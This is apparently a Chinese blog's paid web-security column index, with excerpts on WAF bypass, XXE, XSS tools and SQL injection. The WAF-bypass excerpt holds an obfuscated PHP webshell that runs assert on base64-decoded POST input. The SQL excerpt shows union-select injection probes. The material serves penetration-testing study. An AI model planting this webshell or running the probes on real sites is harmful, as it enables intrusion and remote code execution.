思维导图整理
分享
扫一扫
学习整理的思维导图
优惠券已抵扣
余额抵扣
还需支付
¥99.90
¥299.90
购买须知?
本专栏为图文内容,最终完结不会低于15篇文章。
订阅专栏,享有专栏所有文章阅读权限。
本专栏为虚拟商品,基于网络商品和虚拟商品的性质和特征,专栏一经购买无正当理由不予退款,不支持升级,敬请谅解。
多学点技术
不多学点技术,迟早要露馅儿!!!
展开
-
漏洞发现
目录漏洞发现web服务类数据库类大数据类文件共享远程访问邮件服务其它服务 漏洞发现 web服务类 数据库类 大数据类 文件共享 远程访问 邮件服务 其它服务原创 2021-02-15 11:31:31 · 300 阅读 · 0 评论 -
WAF绕过
目录waf绕过代码拦截行为拦截 waf绕过 代码拦截 变量覆盖 <?php $a = $_GET['x']; $$a = $_GET['y']; $b(base64_decode($_POST['z'])); // ?x=b&y=assert // $a=b $$a=assert $b assert($_POST['z']); ?> 加密混淆 在线加密接口 https://www.phpjiami.com/phpjiami.html 一个开源加密混淆 PHP原创 2021-02-15 11:31:16 · 262 阅读 · 0 评论 -
Java安全&JWT安全
原创 2021-02-15 11:31:02 · 144 阅读 · 0 评论 -
XXE&XML之利用检测
目录XXE&XML之利用检测如何查找该漏洞? XXE&XML之利用检测 如何查找该漏洞? 查看请求的数据包中是否有xml格式的数据。 如果有就可以构造payload发起请求,观察响应结果。 造成该漏洞的原因就是对于该格式的请求数据没有进行严格的过滤。 ...原创 2021-02-15 11:30:40 · 133 阅读 · 0 评论 -
PHP反序列化
原创 2021-02-02 13:14:28 · 172 阅读 · 0 评论 -
业务逻辑越权
原创 2021-02-02 13:13:20 · 169 阅读 · 0 评论 -
文件操作安全
原创 2021-02-02 13:11:50 · 197 阅读 · 0 评论 -
RCE代码及命令执行
原创 2021-02-02 13:09:21 · 419 阅读 · 0 评论 -
SSRF服务器请求伪造
原创 2021-02-02 13:08:27 · 125 阅读 · 0 评论 -
CSRF跨站请求伪造
原创 2021-02-02 13:07:13 · 166 阅读 · 0 评论 -
XSS跨站
目录xss跨站xss工具使用防御vs绕过其它问题 xss跨站 xss工具使用 XSStrike使用 https://github.com/s0md3v/XSStrike #自动化工具说明 XSStrike主要特点反射和 DOM XSS 扫描 多线程爬虫||Context分析||可配置的核心||检测和规避 WAF||老旧的 JS 库扫描||智能payload生成器||手工制作的 HTML & JavaScript 解析器||强大的fuzzing引擎||盲打 XSS 支持||高效的工作流||原创 2021-02-02 13:02:33 · 309 阅读 · 0 评论 -
文件上传
原创 2021-02-02 12:52:59 · 231 阅读 · 0 评论 -
sql注入
目录1 数据库注入2 sql注入数据库类型提交方法数据类型查询方式注入拓展WAF绕过3 MySQL注入信息收集高权限注入相关防注入 1 数据库注入 2 sql注入 数据库类型 Access sqlmap判断是否存在注入 暴力破解 回显 index.php?id=1 order by 4 猜表 index.php?id=1 union select 1,2,3,4 index.php?id=1 union select 1,admin,3,4 # 是否有admin表 Access注入原创 2021-02-02 12:48:08 · 245 阅读 · 0 评论 -
信息收集
原创 2021-02-02 11:49:48 · 150 阅读 · 0 评论